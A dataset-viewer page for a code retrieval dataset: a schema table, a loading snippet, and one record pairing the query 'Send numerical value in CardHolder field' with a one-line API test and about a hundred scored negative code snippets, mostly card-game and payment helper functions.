Dataset schema (column name, type, and observed size range from the dataset viewer):

| Column | Type | Min | Max |
|---|---|---|---|
| query | string (character length) | 9 | 3.4k |
| document | string (character length) | 9 | 87.4k |
| metadata | dict | | |
| negatives | sequence (item count) | 4 | 101 |
| negative_scores | sequence (item count) | 4 | 101 |
| document_score | string (character length) | 3 | 10 |
| document_rank | string (102 distinct values) | | |
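A minimal sketch of loading and inspecting one record, assuming the data is published on the Hugging Face Hub; the dataset identifier below is a placeholder, not the real repository name:

```python
# Hedged sketch: "user/cardholder-retrieval" is a placeholder dataset id.
from datasets import load_dataset

ds = load_dataset("user/cardholder-retrieval", split="train")

row = ds[0]
print(row["query"])                # e.g. "Send numerical value in CardHolder field"
print(row["document"])             # the matching test-case snippet (positive)
print(len(row["negatives"]))       # 4 to 101 mined negative code snippets
print(row["negative_scores"][:3])  # scores aligned index-by-index with `negatives`
print(row["document_score"], row["document_rank"])
```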
Send numerical value in CardHolder field
def test_28(self): assert 'False' == Api.requestBlock('test-28')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_card_value(self, card):\n if card >= 10:\n return 10\n if card == 1:\n return 11\n return card", "def __str__(self):\n return self.card_no", "def value(self, card):\n return self.valores[self.deck.index(card)]", "def __init__(self, cardname, amount):\n self.cardname = str(cardname)\n self.amount = int(amount)", "def get_card_number():\n\n return get_or_append_details('card_number', \"Please enter your credit card number\")", "def get_credit_card_number(self):\n\t\tif len(self.credit_card_number) == 16:\n\t\t\treturn self.credit_card_number\n\t\tr(400, {\"message\" : \"please provide the amount to process\"})\n\t\treturn", "def get_card_val(card):\n\n if card == '1':\n return 1\n if card == '2':\n return 2\n if card == '3':\n return 3\n else:\n return 4", "def card_value (card):\r\n value = card[0]\r\n if value in ['Jack','Queen','King']:\r\n return 10\r\n if value in [2,3,4,5,6,7,8,9,10]:\r\n return value\r\n else:\r\n raise 'CardValueError'", "def safe_number(self):\n mask = '*' * (len(self.card_number) - 4)\n return '{0}{1}'.format(mask, self.card_number[-4:])", "def getNumber():", "def number(self):", "def _set_instructed_amount_33B(self, val):\n self.swift_obj.CurrencyInstructedAmount = val\n self.swift_obj.CurrencyInstructedAmount.swiftTag = \"33B\"", "def _set_details_of_charges_71A(self, val):\n self.swift_obj.DetailsOfCharges = val\n self.swift_obj.DetailsOfCharges.swiftTag = '71A'", "def get_card(self):\n\n card = random.randint(1,13)\n return card", "def card_html_id(card):\n return f'c{card:02d}'", "def convNumToCard(cardNum):\n\n\tcardDict = {14:\"A\", 13:\"K\", 12:\"Q\", 11:\"J\"}\n\n\tif cardNum > 10:\n\t\treturn cardDict[cardNum]\n\telse: return str(cardNum)", "def test_value(self):\n hand = self._hand\n cards = [BjCard('clubs', '10'), BjCard('diamonds', 'A')]\n for card in cards:\n hand.add_card(card)\n self.assertEqual(hand.value, 21)", "def test_card_value(mock_card):\n assert mock_card.value == 1", "async def get_card_value(card):\n return ex.first_result(await ex.conn.fetchrow(\"SELECT value FROM blackjack.cards WHERE id = $1\", card))", "def set_card (self, card):\n\t\tif ((card == 1) or (card == 2)):\n\t\t\tself._card = card\n\t\telse:\n\t\t\tsys.stderr.write(\"\\nERROR : %s card number must be 1 or 2 so it can't be %s !\\n\" % (self._target_id, card))\n\t\t\tsys.exit(1)", "def _convert_charge(val: str) -> str:\n try:\n int_val = int(val)\n # negative value will take care of itself\n sign = \"+\" if int_val > 0 else \"\"\n return f\"{sign}{int_val}\"\n except:\n return val", "def define_card_value(char):\n if char == '2':\n return Value.TWO\n elif char == '3':\n return Value.THREE\n elif char == '4':\n return Value.FOUR\n elif char == '5':\n return Value.FIVE\n elif char == '6':\n return Value.SIX\n elif char == '7':\n return Value.SEVEN\n elif char == '8':\n return Value.EIGHT\n elif char == '9':\n return Value.NINE\n elif char == 'T':\n return Value.TEN\n elif char == 'J':\n return Value.JACK\n elif char == 'Q':\n return Value.QUEEN\n elif char == 'K':\n return Value.KING\n elif char == 'A':\n return Value.ACE\n else:\n return Value.UNDEFINED", "def BJValue(self):\r\n #if the face value of a card is greater or equals to 10\r\n if self.rank >= 10:\r\n #count the value as 10\r\n return 10\r\n #if the face value of a card is less than 10\r\n else:\r\n #return the face value of the card\r\n return self.rank", "def getCardNumber(self,message):\n card = re.findall(Analyzer.rgxCard,message.lower())\n return card[0]", "def getamount(self):\n return 
self.__amount", "def get_card (self, card):\n\t\treturn self._card", "def _format_details_of_charges_71A(self, val):\n return val", "def test_value_hard_hand(self):\n hand = self._hand\n cards = [BjCard('spades', '6'), BjCard('hearts', 'A'), BjCard('clubs', 'K')]\n for card in cards:\n hand.add_card(card)\n self.assertEqual(hand.value, 17)", "def card(n):\r\n assert type(n) == int and n > 0 and n <= 13, \"Bad card n\"\r\n specials = {1: 'A', 11: 'J', 12: 'Q', 13: 'K'}\r\n return specials.get(n, str(n))", "def validate_card():\r\n print(\"Please insert your card\")\r\n card = int(input(\"Please enter 1 if you entered your card\"))\r\n return card", "def setNumPurchased(self, val):\n self.numberPurchased = val", "def get_card(self):\n return self.card", "def card_key(self):\n card_rank = self.rank\n if card_rank > 9:\n card_rank = Card.rank_short[card_rank]\n card_image_name = str(card_rank) + Card.suits_short[self.suit]\n return str(card_image_name)", "def card_id(self):\n return self._card_type.numbers if self._card_type is not None else self._repport", "def test_value_soft_hand(self):\n hand = self._hand\n cards = [BjCard('diamonds', '7'), BjCard('hearts', 'A')]\n for card in cards:\n hand.add_card(card)\n self.assertEqual(hand.value, 18)", "def raw_value(self, value):\n if value is None:\n value = 0\n\n self.__value = value", "def get_card_str(self, card):\n card_str = str(card)\n if card == 11:\n card_str = \"Jack\"\n if card == 12:\n card_str = \"Queen\"\n if card == 13:\n card_str = \"King\"\n if card == 1:\n card_str = \"Ace\"\n \n return card_str", "def __repr__(self):\n return f\"Card({self.face}, {self.value}, {self.suit})\"", "def card(self):\n return self.cdb.name_to_card[self.card_name]", "def Value(self) -> str:", "def get_value(self):\r\n return 0", "def deal_card(self, player: BaseBlackjackPlayer, is_open: bool = True) -> str:\n card = self.deck.pick_card(discard=True, is_open=is_open)\n player.hand.cards.append(card)\n return f\"\\n{player.username} received {card}. 
Total is: {player.hand.value}\"", "def short(self, amount):", "def get_card_info(card):\n result = ((card-1)/13 + 1, card - ((card-1)/13)*13)\n return result", "def raw(self, raw):\n self.uw.send('%s.val = %.4f' % (self.name, self.clipRawLimits(raw)))", "def sendValue(self, value):\n\n print(f'Sending: {value}\\n')\n self.ser.write(bytes([value]))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n\n #decoded_bytes = (ser_bytes.decode(\"ascii\"))\n\n #print(f'Ascii Value: {decoded_bytes}', flush=True)", "def __str__(self):\n #Create dictionary for face cards\n translate = {11:'Jack', 12:'Queen', 13:'King', 14: 'Ace'}\n r = self._rank\n #check for face card\n if r in [11, 12, 13, 14]:\n myrank = translate[r]\n else:\n myrank = str(r)\n return myrank + \" of \" + self._suit", "def send(value):\r\n return value", "def click_card1(self):\n self.driver.find_element_by_css_selector(self.CSS_CVV1).click()\n self.driver.find_element_by_css_selector(\"#cvv > input\").send_keys('111')", "def do_cardid(self, line):\n if self.bootstrap() != 0:\n return self.return_code(1, True)\n\n key = self.card.get_pubkey()\n key_fmted = self.format_pubkey(key)\n\n print('\\nCard ID: %s' % key_fmted)\n return self.return_code(0)", "def __repr__(self):\n val = self.value\n for k, v in Card.VALUES.iteritems():\n if self.value == v:\n val = k\n return str.format('{0}{1}', val, self.suit)", "def get_value(self):", "def charge(self, other):\n if self.flag:\n self.credit += other\n return \"{} Tomans has been added to your card credit and now the credit of your card is {} Tomans\".format(\n other, self.credit)\n else:\n return \"Sorry, your card has expired.\"", "def number(self):\n return str(self._phone)", "def __init__(self, suit: str, rank: str) -> None:\n self.suit = suit\n self.rank = rank\n self.value = Card.values[rank]\n self.hidden = False", "def long(self, amount):", "def mecard(name, tel, email):\n return f'MECARD:N:{name};TEL:{tel};EMAIL:{email};'", "def get_amount(self): \n return len(self.get_cards())", "def get_value(self, character):\n return character.numbers[self.item]", "def value(self):\n return int(self.input.text())", "def value(self):\n return self.raw.get_attribute(\"value\")", "def getAcNum(self):\n\n # stores the integer account number as a formatted 3-digit string (in which 0's occupy unused digits)\n strAcNum = str(\"{self.acNum:03d}\".format(self=self))\n return strAcNum", "def take_card(self, card_color=None):\r\n Card = self.deck.take_card(card_color)\r\n return Card.value if Card.color == Color.BLACK else Card.value * -1", "def _translate_card(self):\n if isinstance(self.suit, int):\n\n if self.suit == 0:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of spades\".format(name)\n\n elif self.suit == 1:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of hearts\".format(name)\n\n elif self.suit == 2:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of diamonds\".format(name)\n\n elif self.suit == 3:\n name, self.values = self._assign_names(self.rank)\n self.name = \"{} of clubs\".format(name)\n\n else:\n raise ValueError(\"The integer passed to the method must be 0, 1, 2, 3\")\n\n else:\n raise TypeError(\"The argument for the method must be an integer\")\n\n return self.name, self.values", "def set_charge(self, val):\n\t\tself.charge = max(0., min(1., val))\n\t\tif self.font:\n\t\t\tself.text = self.font.render('%d%%' % 
int(100*self.charge), True, self.style.t_color)\n\t\tself.update()", "def display_number(com,count):\n print \"NUM: \", count\n try:\n if count > 999:\n count = 999\n safenum=str(int(count))\n #com = serial.Serial(config.devnum, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.num['display']+safenum+config.num['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "def _set_remittance_information_70(self, val):\n self.swift_obj.RemittanceInformation = val\n self.swift_obj.RemittanceInformation.swiftTag = '70'", "def add_number(self, element):\n\n element.no = self.get_available_number(element.grp)", "def card(self, c=None):\n if c: self._card = c\n return self._card", "def demote(self):\n if self.rank != \"A\":\n raise TypeError(\"Card must be an Ace\")\n else:\n self.value = 1", "def charge(self, other):\n self.credit += other\n print(\"{} Tomans has been added to your card credit and now the credit of your card is {} Tomans\".format(other,\n self.credit))", "def deal_cards(self):\n self.card = random.randint(1, 13)\n return self.card", "def get_value(self):\n if self.name in ['1','2','3','4','5','6','7','8', '9', '10']:\n return int(self.name)\n if self.name in ['J','Q','K']:\n return 10\n if self.name == 'A':\n return 1", "def _validate_details_of_charges_71A(self, val):\n return val", "def printCardDetails(self):\n \n print(\"\\nCard Details - {self.name}\\nCard Number: {self.cardNum}\\nExpiry Date (mm/yy): {self.cardExp[0]:02d}/{self.cardExp[1]:02d}\".format(self=self))", "def getNumber(self):\n return self.number", "def clean_value(self):\n value = self.cleaned_data[\"value\"]\n m = value[-1].lower()\n if m in self.MULTIPLIERS:\n mp = self.MULTIPLIERS[m]\n value = value[:-1]\n else:\n mp = 1\n try:\n value = int(value)\n except ValueError:\n raise forms.ValidationError(_(\"Integer is required\"))\n return value * mp", "def __call__(self, value):\n\n print('\\r', end='')\n self.updateAmount(value)\n writec(str(self), self.color, self.style)\n sys.stdout.flush()", "def getValue(self) -> int:\n ...", "def _format_contract_number_partyA_21N(self, val):\n return val", "def _apply_scalar_cards(model, model2_renumber):\n if model.aero is None and model2_renumber.aero:\n model.aero = model2_renumber.aero\n if model.aeros is None and model2_renumber.aeros:\n model.aeros = model2_renumber.aeros\n model.mkaeros += model2_renumber.mkaeros\n for key, param in model2_renumber.params.items():\n if key not in model.params:\n model.params[key] = param", "def safe_number(self):\n mask = '*' * (len(self.account_number) - 4)\n return '{0}{1}'.format(mask, self.account_number[-4:])", "def get_value(self):\n bj_rankings = {'Ace': 11, 'King': 10, 'Queen': 10, 'Jack': 10,\n 10: 10, 9: 9, 8: 8, 7: 7, 6: 6, 5: 5, 4: 4, 3: 3, 2: 2}\n value = 0\n for card in self.cards:\n value += bj_rankings[card.rank]\n\n if value > 21:\n bj_rankings['Ace'] = 1\n value = 0\n for card in self.cards:\n value += bj_rankings[card.rank]\n return value", "def value(self):", "def _setbeneficiary_customer_59F(self, val):\n self.swift_obj.BeneficiaryCustomer_F = val\n self.swift_obj.BeneficiaryCustomer_F.swiftTag = '59F'", "def encode_extra_field(self, relative_orbit):\n if isinstance(relative_orbit, int):\n return \"{:03d}\".format(relative_orbit)\n else:\n return relative_orbit", "def __init__(self, number: str, suit: str) -> None:\n self.number = number\n self.suit = suit", "def kpi_card4(df=data):\n total = 
df['passenger_count'].sum().round()\n return [\n html.H4('Total Passenger Amount', className='card-title'),\n html.P(f'{int(total):,d}', className='card-value'),\n ]", "def blackjackValue(self):\n NUMBERRANKS = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\"]\n FACECARDS = [\"jack\", \"queen\", \"king\"]\n ACE = [\"ace\"]\n if self.rank in NUMBERRANKS:\n return int(self.rank)\n elif self.rank in FACECARDS:\n return 10\n elif self.rank in ACE:\n return 11", "def test_prepare_value_int(self):\n field = FractionField()\n result = field.prepare_value(1)\n self.assertEqual(\"1\", result)", "def serial_number(self):\n return self._packet.get('serial-number', '')", "def __card_display(self):\n return ''.join([(each_number if (i == 0 or i % 4 != 0) else ' ' + each_number)\n for i, each_number in enumerate(self.card_number)])", "def _format_senders_reference_20(self, val):\n if val:\n sett_obj = acm.FSettlement[str(val)]\n val = \"%s-%s-%s-%s\" % (get_settlement_reference_prefix(), str(val), str(get_message_version_number(sett_obj)), str(self.swift_message_type[2:5]))\n return val", "def __init__(self, value, suit) -> None:\n self.value = value\n self.suit = suit", "def __str__(self):\n\n\t\tif self.rawValue == None: return str()\n\n\t\tx = self.rawValue\n\n\t\tif not x.isdigit() or len(x) != 44 or len(set(x)) == 1:\n\t\t\treturn self.rawValue\n\n\t\treturn '{} {} {} {} {} {} {} {} {} {} {}'.format(x[:4], x[4:8], x[8:12], x[12:16], x[16:20], x[20:24], x[24:28], x[28:32], x[32:36], x[36:40], x[40:44])", "def __init__(self, currency, value):\n assert isinstance(value, six.integer_types)\n assert not isinstance(currency, six.string_types)\n self.currency = currency\n self.value = value", "def data(value):\n return value", "def _set_contract_number_partyA_21N(self, val):\n self.swift_obj.SequenceA_GeneralInformation.ContractNumberPartyA = val\n self.swift_obj.SequenceA_GeneralInformation.ContractNumberPartyA.swiftTag = '21N'", "def __int__(self):\n\n return self.value", "def __init__(self, number):\n self.number = number\n self.available = True", "def on_change_renew(self, cr, uid, ids, enrich_id, context=None):\n enrich = self.browse(cr, uid, enrich_id, context=context)\n \tamount=enrich.amount\n\n \treturn {\n \t'value': {\n 'amount': amount,\n }\n }" ]
[ "0.6360001", "0.6286262", "0.6143093", "0.61399215", "0.61090577", "0.609702", "0.5950806", "0.58012486", "0.5681816", "0.566631", "0.564746", "0.55345756", "0.5511834", "0.55029047", "0.54479784", "0.5423257", "0.54220426", "0.54016936", "0.53752905", "0.536577", "0.53501254", "0.53398013", "0.5339342", "0.5336879", "0.53362066", "0.5329999", "0.5321045", "0.52628565", "0.5261947", "0.52504355", "0.5227937", "0.522581", "0.52186036", "0.5191723", "0.51826274", "0.51807934", "0.5168586", "0.5166014", "0.51495695", "0.5148456", "0.5147658", "0.51458186", "0.514444", "0.51413226", "0.5119736", "0.51184475", "0.51112795", "0.5096098", "0.5088141", "0.5087697", "0.5082579", "0.5080768", "0.5079714", "0.5062923", "0.50615937", "0.50554466", "0.50550157", "0.5051366", "0.5050202", "0.5039322", "0.503709", "0.50280315", "0.5027244", "0.5012447", "0.5007388", "0.5003274", "0.5001084", "0.49970353", "0.4991981", "0.49857655", "0.49832943", "0.4978152", "0.49748248", "0.49744305", "0.49687928", "0.4967739", "0.4961532", "0.49586734", "0.49579978", "0.49572575", "0.49564964", "0.49539265", "0.49490628", "0.49488655", "0.49424526", "0.4938662", "0.49370182", "0.49354938", "0.49289268", "0.49288493", "0.49230748", "0.49196404", "0.49184033", "0.49157763", "0.4915192", "0.49148068", "0.4906672", "0.49050424", "0.48988315", "0.48987618", "0.48972172" ]
0.0
-1
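The `metadata` field of each record declares a triplet objective over (`query`, `document`, `negatives`). As an illustration of how such a record could be expanded into per-negative training triples, here is a hedged sketch; the use of sentence-transformers' `InputExample` is an assumption for demonstration, not something the dataset itself prescribes:

```python
# Illustrative only: expand one record into (anchor, positive, negative) triples.
from sentence_transformers import InputExample

def record_to_triplets(row):
    """row is one dataset record with 'query', 'document' and 'negatives' keys."""
    return [
        InputExample(texts=[row["query"], row["document"], negative])
        for negative in row["negatives"]
    ]

# Usage with the dataset loaded in the earlier sketch:
# triplets = record_to_triplets(ds[0])   # one InputExample per mined negative
```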
Check length of CardHolder field (len = 30)
def test_29(self): assert 'True' == Api.requestBlock('test-29')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def len12(self, len): # -> None:\n ...", "def get_length(self):\n return len(self.cards)", "def test_partial_deck_has_fewer_cards(self):\n self.assertEqual(len(self.partialDeck.deck), 46)", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def __len__(self):\n return len(self.cards)", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_shared_cards_len(self):\n self.assertEqual(len(self.hand.sharedCards), 3)", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def __len__(self):\n return len(self._cards)", "def __len__(self):\n return len(self._cards)", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def get_length(self):\r\n return len(self.deck)", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def __len__( self ):\n \n return len(self.__deck)", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def verify_length(src_json: Dict[str, List[str]]):\n if len(src_json.get(\"Leds\", [])) == 0:\n return \"No Leds in Group\"", "def len23(self, len): # -> None:\n ...", "def __len__(self):\n return len(self._cards)", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def length_of_name(self, name):\n length = 
len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def length(value):\n\n # Try to return the length\n return len(value)", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def __len__(self):\n return 30", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' * 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def __len__(self):\n return len(self.raw)", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def check_bag_size(self):\r\n return len(self.db.tilestring)", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def length(self):\n ...", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def __len__(self) -> int:\n return len(self.length)", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def test_field_length_matches_data_type_field_length(self):\n for known_message_type in KNOWN_MESSAGE_TYPES:\n for field in known_message_type.fields:\n if self.is_verbose:\n print 'Checking length setup of field {0} in message {1}'.format(field.name, known_message_type.name)\n self.assertEqual(field.length, field.data_type.length)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def _requiredLength(self):\n if self.partner is not None:\n if self.partner.level == self.level:\n return len(self.partner)\n elif self.partner.level < self.level:\n return 1\n elif self._value is not None:\n return 1\n else:\n return 0", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def validate_length(string):\n if len(string) > 110:\n raise ValidationError('Tweet must be less than 110 characters')", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def test_deck_has_52_cards(self):\n self.assertEqual(len(cardutils.Deck().deck), 52)", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def 
Length(self) -> int:", "def Length(self) -> int:", "def __len__(self):\r\n return 4", "def __len__(self) -> int:\n return 3", "def remaining_cards(self):\n\n return str(len(self.hand))", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_len(self):\n self.assertEqual(len(self.tester), 30)", "def field_length(self,\r\n entrylist=None):\r\n\r\n\r\n if entrylist is None:\r\n entrylist = list(self.default_dict['field'].keys())\r\n maxlength = 0\r\n for i_temp in entrylist:\r\n if len(self.default_dict['field'][i_temp]) > maxlength:\r\n maxlength = len(self.default_dict['field'][i_temp])\r\n return maxlength", "def __len__(self):\n\t\treturn 3", "def __len__():", "def __len__():", "def __len__():", "def check_embed(embed: Embed) -> bool:\n if len(embed) <= 6000:\n if hasattr(embed, \"title\"):\n if len(embed.title) <= 256:\n pass\n else:\n return False\n if len(embed.fields) <= 25:\n for field in embed.fields:\n if len(field.name) <= 69420:\n pass", "def test_check_name_is_3_parts():\n check_name_length()", "def length(self):\n pass", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def test_prep_charfield_size(self):\n pass", "def __len__(self):\n return self._length # pylint: disable = E1101", "def reallength(value):\n try:\n value.count()\n except:\n return len(value)", "def test_client_email_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_email').max_length\n self.assertEquals(max_length, 100)", "def __length_hint__(self) -> 'Literal[28]':\n return 28", "def __len__(self) -> int:\n return self.length", "def __len__(self):\n\n return self.length", "def __len__(self) -> int:\n return len(self.getvalue())", "def __len__(self):\n return 19", "def test_candidatesubr_len(self):\n\n self.assertEqual(len(self.cand_subr), 3)", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def test_len(self):\n self.assertEqual(len(self.tester), 21)", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def __len__(self):\n # TODO: Is this method used?\n return self._info['length']", "def length(self) -> int:\n pass", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def __len__(self) -> int:\n return len(self.value)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return self.cli.passwords.len()", "def __len__(self):\n return len(self._canaux)", "def getLength(self):\n return None", "def getLength(self):\n return None", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def _validate_string_max_length(self, value):\n if self.max_length is not None:\n return len(str(value)) <= 
self.max_length\n else:\n return True", "def _check_description_count(self):\n\n for rec in self:\n if rec.description and len(rec.description)>50:\n raise except_orm(_('Warning!'),\n _(\"Description Lenght must be less than or equal to 50. \"))", "def __len__(self):\n return 20", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def __len__(self):\n return len(self.spricht())", "def __len__(self):\n\t\treturn 8" ]
[ "0.6906881", "0.64856213", "0.645354", "0.6432503", "0.6383984", "0.6370204", "0.63560504", "0.63330877", "0.6323368", "0.6306261", "0.62849426", "0.62839264", "0.6276887", "0.6276887", "0.62720317", "0.6252744", "0.6238115", "0.6228162", "0.6224199", "0.6197445", "0.6196399", "0.61821103", "0.6167665", "0.61317706", "0.6107292", "0.6106109", "0.6056621", "0.60298043", "0.601517", "0.6013158", "0.6000801", "0.59928536", "0.5988711", "0.5975681", "0.595917", "0.59409523", "0.5914727", "0.5914727", "0.5912202", "0.59087175", "0.5907185", "0.59012663", "0.5896035", "0.58920324", "0.5883397", "0.58755434", "0.58733696", "0.5867748", "0.58617574", "0.58617574", "0.58617574", "0.58617574", "0.58617574", "0.58617574", "0.58505076", "0.58505076", "0.5850485", "0.5846937", "0.58373874", "0.583465", "0.5831536", "0.5828399", "0.5823291", "0.5808147", "0.5808147", "0.5808147", "0.5805381", "0.58037776", "0.5800443", "0.57970846", "0.5793131", "0.57914805", "0.5787952", "0.577915", "0.5777581", "0.57661694", "0.5766112", "0.57613033", "0.5757113", "0.5755749", "0.5747707", "0.5745179", "0.57435066", "0.57393545", "0.57276344", "0.5724594", "0.5724253", "0.5720317", "0.5720317", "0.5720317", "0.57145506", "0.5712677", "0.57100415", "0.57100415", "0.57059973", "0.5705907", "0.5699107", "0.56951535", "0.5691765", "0.56852823", "0.5683927" ]
0.0
-1
Check length of CardHolder field (len = 31)
def test_30(self): assert 'False' == Api.requestBlock('test-30')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def test_shared_cards_len(self):\n self.assertEqual(len(self.hand.sharedCards), 3)", "def get_length(self):\n return len(self.cards)", "def __len__(self):\n return len(self.cards)", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def __len__(self):\n return len(self._cards)", "def __len__(self):\n return len(self._cards)", "def len12(self, len): # -> None:\n ...", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def __len__( self ):\n \n return len(self.__deck)", "def __len__(self):\n return len(self._cards)", "def test_partial_deck_has_fewer_cards(self):\n self.assertEqual(len(self.partialDeck.deck), 46)", "def get_length(self):\r\n return len(self.deck)", "def verify_length(src_json: Dict[str, List[str]]):\n if len(src_json.get(\"Leds\", [])) == 